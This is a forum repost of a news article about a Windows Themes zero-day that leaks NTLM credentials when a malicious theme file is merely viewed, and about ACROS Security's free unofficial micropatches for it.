Gandalf_The_Grey
Level 84
Thread author
Verified
Honorary Member
Top Poster
Content Creator
Well-known
- Apr 24, 2016
- 7,478
Free unofficial patches are now available for a new Windows Themes zero-day vulnerability that allows attackers to steal a target's NTLM credentials remotely.
NTLM has been extensively exploited in NTLM relay attacks, where threat actors force vulnerable network devices to authenticate against servers under their control, and pass-the-hash attacks, where they exploit system vulnerabilities or deploy malicious software to acquire NTLM hashes (which are hashed passwords) from targeted systems.
Once they have the hash, the attackers can authenticate as the compromised user, gaining access to sensitive data and spreading laterally on the now-compromised network. One year ago, Microsoft announced that it plans to kill off the NTLM authentication protocol in Windows 11 in the future.
ACROS Security researchers discovered the new Windows Themes zero-day (which has not yet been assigned a CVE ID) while developing a micropatch for a security issue tracked as CVE-2024-38030 that could leak a user's credentials (reported by Akamai's Tomer Peled), itself a bypass for another Windows Themes spoofing vulnerability (CVE-2024-21320) patched by Microsoft in January.
Peled found that "when a theme file specified a network file path for some of the theme properties (specifically BrandImage and Wallpaper), Windows would automatically send authenticated network requests to remote hosts, including user's NTLM credentials when such theme file would be viewed in Windows Explorer."
"This meant that merely seeing a malicious theme file listed in a folder or placed on the desktop would be enough for leaking user's credentials without any additional user action," ACROS Security CEO Mitja Kolsek said.
Even though Microsoft has patched CVE-2024-38030 in July, ACROS Security found another issue attackers could exploit to steal a target's NTLM credentials on all fully updated Windows versions, from Windows 7 to Windows 11 24H2.
"So instead of just fixing CVE-2024-38030, we created a more general patch for Windows themes files that would cover all execution paths leading to Windows sending a network request to a remote host specified in a theme file upon merely viewing the file," Kolsek added.
New Windows Themes zero-day gets free, unofficial patches
Free unofficial patches are now available for a new Windows Themes zero-day vulnerability that allows attackers to steal a target's NTLM credentials remotely.
www.bleepingcomputer.com